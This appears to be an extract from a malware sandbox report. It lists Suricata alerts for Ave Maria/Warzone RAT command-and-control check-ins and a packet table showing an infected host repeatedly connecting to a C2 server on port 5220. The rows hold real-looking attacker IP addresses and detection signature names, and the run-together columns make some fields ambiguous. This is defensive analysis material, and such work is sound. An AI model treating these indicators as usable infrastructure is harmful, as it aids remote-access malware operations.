                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-12T21:54:10.245477+01002036735ET MALWARE Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)187.120.121.1605220192.168.2.2249231TCP
                                              2024-12-12T21:54:10.245477+01002852326ETPRO MALWARE Ave Maria/Warzone RAT InitializePacket187.120.121.1605220192.168.2.2249231TCP
                                              2024-12-12T21:54:10.287439+01002036734ET MALWARE Ave Maria/Warzone RAT Encrypted CnC Checkin1192.168.2.224923187.120.121.1605220TCP
                                              2024-12-12T21:54:10.287439+01002852327ETPRO MALWARE Ave Maria/Warzone RAT BeaconResponse1192.168.2.224923187.120.121.1605220TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 12, 2024 21:45:41.609093904 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:41.609160900 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:41.609447002 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:41.615354061 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:41.615431070 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:43.416563988 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:43.416740894 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:43.421260118 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:43.421294928 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:43.421865940 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:43.421938896 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:43.493657112 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:43.539343119 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.018018961 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.018115044 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.018177032 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.018197060 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.018245935 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.018318892 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.018387079 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.024394035 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.136338949 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.136455059 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.136497021 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.136558056 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.182813883 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.182949066 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.183079004 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.183079004 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.183120012 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.183142900 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.183168888 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.309662104 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.309814930 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.310007095 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.310007095 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.310062885 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.310097933 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.310111046 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.337799072 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.337939978 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.338011980 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.338012934 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.338084936 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.338148117 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.361763000 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.361892939 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.362071037 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.362147093 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.362181902 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.362205029 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.389851093 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.389987946 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.390110970 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.390180111 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.390233040 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.390233040 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.390261889 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.492409945 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.492553949 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.492566109 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.492630959 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.492737055 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.492737055 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.492737055 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.511526108 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.511665106 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.511742115 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.511809111 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.511857033 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.511881113 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.529526949 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.529609919 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.529664040 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.529814959 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.594187975 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.594338894 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.594474077 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.594474077 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.594517946 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.594540119 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.594567060 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.694367886 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.694513083 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.694628000 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.694713116 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.694763899 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.694763899 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.694796085 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.706912994 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.707045078 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.707092047 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.707128048 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.707201004 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.707201004 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.720725060 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.720822096 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.720853090 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.721098900 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.731213093 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.731309891 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.731358051 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.731529951 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.740669012 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.740775108 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.740813971 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.740890026 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.751929998 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.751992941 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.752027988 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.752059937 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.752192020 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.752192020 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.754955053 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.755028963 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.755043030 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.755064964 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.755103111 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.755135059 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.755135059 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:44.755153894 CET4434916394.156.167.55192.168.2.22
                                              Dec 12, 2024 21:45:44.755209923 CET49163443192.168.2.2294.156.167.55
                                              Dec 12, 2024 21:45:50.791065931 CET491645220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:45:50.911216021 CET52204916487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:45:50.911561012 CET491645220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:45:53.062000036 CET52204916487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:45:53.062117100 CET491645220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:45:58.199584961 CET491655220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:45:58.319458008 CET52204916587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:45:58.319593906 CET491655220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:00.457257986 CET52204916587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:00.457324028 CET491655220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:05.838274956 CET491665220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:05.958690882 CET52204916687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:05.958791018 CET491665220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:08.111973047 CET52204916687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:08.112278938 CET491665220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:13.492149115 CET491675220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:13.613055944 CET52204916787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:13.613327980 CET491675220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:15.767265081 CET52204916787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:15.767435074 CET491675220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:21.157941103 CET491685220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:21.277823925 CET52204916887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:21.278109074 CET491685220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:23.407768965 CET52204916887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:23.407947063 CET491685220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:28.546950102 CET491695220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:28.667072058 CET52204916987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:28.667366982 CET491695220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:30.814694881 CET52204916987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:30.814807892 CET491695220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:35.948195934 CET491705220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:36.070137978 CET52204917087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:36.070337057 CET491705220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:38.222312927 CET52204917087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:38.222481966 CET491705220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:43.362454891 CET491715220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:43.483686924 CET52204917187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:43.483807087 CET491715220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:45.607801914 CET52204917187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:45.607954025 CET491715220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:50.746385098 CET491725220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:50.867644072 CET52204917287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:50.867784977 CET491725220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:53.002129078 CET52204917287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:53.002221107 CET491725220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:58.140350103 CET491735220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:46:58.260333061 CET52204917387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:46:58.260436058 CET491735220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:00.390002966 CET52204917387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:00.390271902 CET491735220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:05.532284021 CET491745220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:05.653069973 CET52204917487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:05.653147936 CET491745220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:07.799649954 CET52204917487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:07.799731970 CET491745220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:12.939575911 CET491755220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:13.061414003 CET52204917587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:13.061789989 CET491755220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:15.186693907 CET52204917587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:15.186938047 CET491755220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:20.308703899 CET491765220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:20.429037094 CET52204917687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:20.429194927 CET491765220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:22.596738100 CET52204917687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:22.596920013 CET491765220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:27.976098061 CET491775220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:28.097520113 CET52204917787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:28.097794056 CET491775220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:30.252942085 CET52204917787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:30.253081083 CET491775220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:35.624923944 CET491785220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:35.746159077 CET52204917887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:35.746282101 CET491785220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:37.874697924 CET52204917887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:37.874938011 CET491785220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:43.019509077 CET491795220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:43.139352083 CET52204917987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:43.139509916 CET491795220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:45.368537903 CET52204917987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:45.368689060 CET491795220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:50.505776882 CET491805220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:50.626236916 CET52204918087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:50.626328945 CET491805220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:52.768593073 CET52204918087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:52.768722057 CET491805220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:57.924170971 CET491815220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:47:58.044749022 CET52204918187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:47:58.045051098 CET491815220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:00.222786903 CET52204918187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:00.223061085 CET491815220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:05.357634068 CET491825220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:05.477493048 CET52204918287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:05.477612019 CET491825220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:07.656550884 CET52204918287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:07.656724930 CET491825220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:12.790322065 CET491835220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:12.910582066 CET52204918387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:12.910801888 CET491835220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:15.044744015 CET52204918387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:15.044867039 CET491835220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:20.175793886 CET491845220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:20.300291061 CET52204918487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:20.300662041 CET491845220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:22.473232031 CET52204918487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:22.473342896 CET491845220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:27.609652042 CET491855220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:27.729626894 CET52204918587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:27.729717970 CET491855220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:29.894819975 CET52204918587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:29.895046949 CET491855220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:35.029407978 CET491865220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:35.149672031 CET52204918687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:35.149813890 CET491865220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:37.301105976 CET52204918687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:37.301255941 CET491865220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:42.443883896 CET491875220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:42.563898087 CET52204918787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:42.564518929 CET491875220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:44.723124027 CET52204918787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:44.723263979 CET491875220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:49.865906954 CET491885220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:49.991278887 CET52204918887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:49.991426945 CET491885220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:52.126379967 CET52204918887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:52.126463890 CET491885220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:57.257456064 CET491895220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:57.377265930 CET52204918987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:57.377451897 CET491895220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:59.519817114 CET52204918987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:59.520078897 CET491895220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:04.666584969 CET491905220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:04.787405014 CET52204919087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:04.787606001 CET491905220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:06.941761017 CET52204919087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:06.941854000 CET491905220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:12.076809883 CET491915220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:12.196619034 CET52204919187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:12.196913958 CET491915220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:14.333525896 CET52204919187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:14.333751917 CET491915220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:19.476805925 CET491925220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:19.596740007 CET52204919287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:19.596894026 CET491925220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:21.863621950 CET52204919287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:21.863774061 CET491925220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:27.245124102 CET491935220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:27.364785910 CET52204919387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:27.364902020 CET491935220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:29.501331091 CET52204919387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:29.501429081 CET491935220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:34.641370058 CET491945220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:34.761307001 CET52204919487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:34.761579990 CET491945220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:36.907962084 CET52204919487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:36.908062935 CET491945220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:42.043437958 CET491955220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:42.163441896 CET52204919587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:42.163583994 CET491955220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:44.282843113 CET52204919587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:44.283035994 CET491955220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:49.430718899 CET491965220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:49.550645113 CET52204919687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:49.550843000 CET491965220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:51.751578093 CET52204919687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:51.751713037 CET491965220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:56.897327900 CET491975220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:57.018184900 CET52204919787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:57.018407106 CET491975220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:59.258483887 CET52204919787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:59.258796930 CET491975220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:04.403368950 CET491985220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:04.523308039 CET52204919887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:04.523448944 CET491985220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:06.661789894 CET52204919887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:06.661875010 CET491985220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:11.784930944 CET491995220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:11.904805899 CET52204919987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:11.905035973 CET491995220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:14.052505970 CET52204919987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:14.052812099 CET491995220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:19.188400030 CET492005220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:19.308279991 CET52204920087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:19.308386087 CET492005220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:21.455248117 CET52204920087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:21.455486059 CET492005220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:26.608683109 CET492015220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:26.728956938 CET52204920187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:26.729214907 CET492015220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:28.880733013 CET52204920187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:28.880816936 CET492015220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:34.027301073 CET492025220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:34.147284031 CET52204920287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:34.147542953 CET492025220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:36.283917904 CET52204920287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:36.284183979 CET492025220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:41.424650908 CET492035220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:41.545041084 CET52204920387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:41.545156002 CET492035220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:43.701528072 CET52204920387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:43.701637030 CET492035220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:48.845019102 CET492045220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:48.964735031 CET52204920487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:48.964884043 CET492045220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:51.116672039 CET52204920487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:51.116760015 CET492045220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:56.243340969 CET492055220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:56.363231897 CET52204920587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:56.363432884 CET492055220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:58.522135019 CET52204920587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:58.522248030 CET492055220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:03.667649031 CET492065220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:03.787617922 CET52204920687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:03.787864923 CET492065220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:05.925163984 CET52204920687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:05.925350904 CET492065220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:11.062244892 CET492075220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:11.182255983 CET52204920787.120.121.160192.168.2.22
